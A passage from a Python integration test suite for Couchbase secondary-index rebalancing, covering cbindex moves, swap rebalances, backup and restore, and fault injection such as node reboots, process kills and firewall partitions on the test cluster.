self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with destination host not specified
output, error = self._cbindex_move(index_server,
" ",
indexes,
expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
# cbindex move with index names not specified
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
" ",
expect_failure=True,
alter_index=self.alter_index)
expected_err_msg = "invalid index specified"
if self.alter_index:
expected_err_msg = "syntax error"
if expected_err_msg not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
# cbindex move with index name which does not exist
self.run_async_index_operations(operation_type="drop_index")
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
expect_failure=True,
alter_index=self.alter_index)
expected_err_msg = "invalid index specified"
if self.alter_index:
expected_err_msg = "not found"
if expected_err_msg not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
def test_rebalance_in_with_different_topologies(self):
self.services_in = self.input.param("services_in")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=[self.services_in])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [])
self.run_operation(phase="after")
def test_rebalance_out_with_different_topologies(self):
self.server_out = self.input.param("server_out")
# remove the n1ql node which is being rebalanced out
all_n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
for n1ql_node in all_n1ql_nodes:
if n1ql_node.ip not in str(self.servers[self.server_out]):
self.n1ql_server = n1ql_node
self.n1ql_node = n1ql_node
break
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.servers[self.server_out]
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
self.run_operation(phase="after")
def test_swap_rebalance_with_different_topologies(self):
self.server_out = self.input.param("server_out")
self.services_in = self.input.param("services_in")
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.servers[self.server_out]
# remove the n1ql node which is being rebalanced out
all_n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
for n1ql_node in all_n1ql_nodes:
if n1ql_node.ip not in str(self.servers[self.server_out]):
self.n1ql_server = n1ql_node
self.n1ql_node = n1ql_node
break
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[], services=[self.services_in])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
[nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
self.run_operation(phase="after")
def test_backup_restore_after_gsi_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self.run_operation(phase="after")
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self._create_backup(kv_node)
self._create_restore(kv_node)
def test_backup_restore_while_gsi_rebalance_is_running(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self._create_backup(kv_node)
self._create_restore(kv_node)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self._run_prepare_statement()
self.run_operation(phase="after")
def test_gsi_rebalance_using_couchbase_cli(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
shell = RemoteMachineShellConnection(kv_node)
command = "{0}couchbase-cli rebalance -c {1} -u {2} -p {3} --server-remove={4}:8091".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password,
nodes_out_list.ip)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
self.sleep(30)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
# rebalance in a node
command = "{0}couchbase-cli server-add -c {1} -u {2} -p {3} --server-add={4} --server-add-username={5} " \
"--server-add-password={6}".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password,
self.servers[self.nodes_init].ip, self.servers[self.nodes_init].rest_username,
self.servers[self.nodes_init].rest_password)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
if e or not [x for x in o if 'SUCCESS: Server added' in x]:
self.fail("server-add failed")
self.sleep(30)
command = "{0}couchbase-cli rebalance -c {1} -u {2} -p {3}".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
if e or not [x for x in o if 'SUCCESS: Rebalance complete' in x]:
self.fail("rebalance failed")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.run_operation(phase="after")
def test_long_running_scan_with_gsi_rebalance(self):
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
emit_fields = "*"
body = {"stale": "False"}
query_definition = QueryDefinition(
index_name="multiple_field_index",
index_fields=["name", "age", "email", "premium_customer"],
query_template=RANGE_SCAN_TEMPLATE.format(emit_fields, " %s " %
"name > \"Adara\" AND "
"name < \"Winta\" "
"AND age > 0 AND age "
"< 100 ORDER BY _id"),
groups=["multiple_field_index"],
index_where_clause=" name IS NOT NULL ")
self.rest = RestConnection(nodes_out_list)
id_map = self.create_index_using_rest(self.buckets[0], query_definition)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# run a long running scan during a gsi rebalance
t1 = threading.Thread(target=RestConnection(nodes_out_list).full_table_scan_gsi_index_with_rest,
args=(id_map["id"], body,))
t1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
t2 = threading.Thread(target=RestConnection(self.servers[self.nodes_init]).full_table_scan_gsi_index_with_rest,
args=(id_map["id"], body,))
t2.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t2.join()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_reboot_on_indexer_node_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# reboot a kv node during gsi rebalance
self.reboot_node(self.servers[self.nodes_init])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
self.sleep(30)
self.run_operation(phase="after")
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
# yet to confirm if parallel cbindex moves are supported, hoping to catch some panic if its not
def test_cbindex_move_when_one_move_index_is_already_runnning(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
for index in indexes:
threads.append(
threading.Thread(target=self._cbindex_move, args=(index_server, self.servers[self.nodes_init], index, self.alter_index)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.sleep(60)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_kill_n1ql_during_gsi_rebalance(self):
self.run_operation(phase="before")
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill n1ql while rebalance is running
self.sleep(5)
for i in range(20):
self._kill_all_processes_cbq(n1ql_node)
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_kill_indexer_during_gsi_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# do a swap rebalance
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill indexer while rebalance is running
for i in range(20):
self._kill_all_processes_index(self.servers[self.nodes_init])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after killing indexer node")
self.sleep(60)
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
def test_autofailover_with_gsi_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
RestConnection(self.master).update_autofailover_settings(True, 30)
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
index_node = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
remote = RemoteMachineShellConnection(kv_node[1])
remote.stop_server()
self.sleep(40, "Wait for autofailover")
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [index_node, kv_node[1]])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
self.fail("rebalance failed with error : {0}".format(str(ex)))
finally:
remote.start_server()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_node])
self.run_operation(phase="after")
self.sleep(30)
def test_gsi_rebalance_can_be_resumed_after_failed_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# reboot a kv node during gsi rebalance
self.reboot_node(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
self.sleep(60)
# Rerun rebalance to check if it can recover from failure
for i in range(5):
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" in str(ex) and i == 4:
self.fail("rebalance did not recover from failure : {0}".format(str(ex)))
# Rerun after MB-23900 is fixed.
else:
break
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_server])
self.run_operation(phase="after")
def test_induce_fts_failure_during_gsi_rebalance(self):
self.run_operation(phase="before")
fts_node = self.get_nodes_from_services_map(service_type="fts", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.sleep(5)
for i in range(20):
self._kill_fts_process(fts_node)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill fts while rebalance is running
self.sleep(5)
for i in range(20):
self._kill_fts_process(fts_node)
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_on_deferred_index_then_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# create index with defer_build = True
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Move the indexes
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
log.info(indexes)
self.sleep(2)
i = 1
for index in indexes:
self._cbindex_move(index_server, self.servers[self.nodes_init], index, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], i)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
i += 1
self.sleep(60)
# Now build the index on the new node
exceptions = self._build_index()
if exceptions:
self.fail("build index after rebalance failed")
# Move the indexes again
j = 1
for index in indexes:
self._cbindex_move(self.servers[self.nodes_init], index_server, index, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(index_server, j)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
j += 1
self.sleep(60)
self.run_operation(phase="after")
def test_cbindex_move_with_reboot_of_destination_node(self):
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue))
threads.append(t1)
t1.start()
self.sleep(1)
self.reboot_node(self.servers[self.nodes_init])
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "dial tcp {0}:9100: getsockopt: connection refused".format(
self.servers[self.nodes_init].ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail during a reboot")
def test_cbindex_move_after_network_partitioning(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
try:
self.start_firewall_on_node(index_server)
output, error = self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, self.alter_index,
expect_failure=True)
if not [x for x in error if 'Client.Timeout exceeded while awaiting headers' in x]:
if not [x for x in error if 'i/o timeout' in x]:
self.fail("cbindex move did not fail during network partition with expected error message : {0}".format(
error))
except Exception as ex:
self.fail(str(ex))
finally:
self.stop_firewall_on_node(index_server)
self.run_operation(phase="after")
def test_partition_n1ql_during_gsi_rebalance(self):
self.run_operation(phase="before")
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# partition n1ql node while running gsi rebalance
self.sleep(5)
for i in range(5):
self.start_firewall_on_node(n1ql_node)
self.stop_firewall_on_node(n1ql_node)
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
except Exception as ex:
self.fail("gsi rebalance failed because firewall was enabled on n1ql node : {0}".format(str(ex)))
finally:
self.stop_firewall_on_node(n1ql_node)
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_with_reboot_of_source_node(self):
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue, True))
threads.append(t1)
t1.start()
self.sleep(2)
self.reboot_node(index_server)
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "dial tcp {0}:9100: getsockopt: connection refused".format(index_server.ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
# queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail during a reboot")
def test_network_partitioning_between_kv_indexer_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
kv_node_partition = kv_server[1]
if kv_server[1] == self.servers[0]:
kv_node_partition = kv_server[0]
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
# rebalance out a indexer node
log.info("start rebalance during network partitioning")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.start_firewall_on_node(index_server)
self.start_firewall_on_node(self.servers[self.nodes_init])
self.start_firewall_on_node(kv_node_partition)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after kv index network partitioning")
finally:
self.stop_firewall_on_node(index_server)
self.stop_firewall_on_node(self.servers[self.nodes_init])
self.stop_firewall_on_node(kv_node_partition)
self.run_operation(phase="after")
def test_cbindex_move_with_index_server_being_killed(self):
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue, True))
threads.append(t1)
t1.start()
self.sleep(2)
self._kill_all_processes_index(index_server)
self._kill_all_processes_index(self.servers[self.nodes_init])
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "WatcherServer.runOnce() : Watcher terminated unexpectedly".format(self.servers[self.nodes_init].ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
# queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail when indexer server was killed")
def test_gsi_rebalance_with_multiple_nodes_in_swap_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = nodes_out_list[1:3]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_different_scan_consistency(self):
n1ql_server = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = nodes_out_list[1:3]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
query = "SELECT * FROM default where `question_values` IS NOT NULL ORDER BY _id"
result_rp = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="request_plus")
result_sp = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="statement_plus")
result_nb = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="not_bounded")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
